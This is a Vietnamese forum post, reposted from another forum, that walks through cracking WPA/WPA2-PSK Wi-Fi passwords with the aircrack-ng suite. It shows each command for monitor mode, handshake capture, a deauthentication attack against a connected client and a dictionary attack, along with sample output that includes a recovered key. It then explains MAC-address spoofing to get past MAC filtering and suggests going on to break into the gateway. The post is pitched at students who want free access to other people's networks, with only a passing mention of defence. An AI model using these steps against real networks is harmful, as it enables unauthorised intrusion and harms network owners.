Được gửi bởi
lyberia
hack wifi không phải là không thể được,nhưng tiến trình thực hiện khá phức tạp,mình xin trình bày lại bài viết của pác TranDuyNinh trên diễn đàn HVAOnline (xin lỗi các mod tại ddth nhé!!)
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn ************** wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn
công cụ dùng trong bài : back track 2 live cd . download :remote exploit forum + google
mac adress của máy tấn công :00:0F:B5:88:AC:82
mac adress của máy trong mạng wifi :00:0F:B5:FD:FB:C2
mac adress của acssespoint : 00:14:6C:7E:40:80
tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0
bước 1 : chuyển wireless card qua chế độ monitor
ifconfig eth0 up
iwconfig eth0 mode monitor
iwconfig
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bước 2 : run airodum-ng để collect authentical :
airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0
*
-c 9 is chanel của network
- -bssid 00:14:6C:7E:40:80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.
khi thành công bạn được như sau :
CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy
BSSID STATION PWR Lost Packets Probes
00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116
WPA handshake: 00:14:6C:7E:40:80” ở trên cùng nghĩa là airodump đang collect IVs file.
bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )
nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều :
run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn :
aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
khi thành công :
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]
sau đó là đợi , càng lâu càng tốt nha
cuối cùng run aircrack-ng để ************** :
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap
psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)
khi thành công :
Aircrack-ng 0.8
[00:00:00] 2 keys tested (37.20 k/s)
KEY FOUND! [ 12345678 ]
Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB
vậy là có thể ************** thành công wpa rồi
lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ ************** nha
VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được
muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó :
bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac"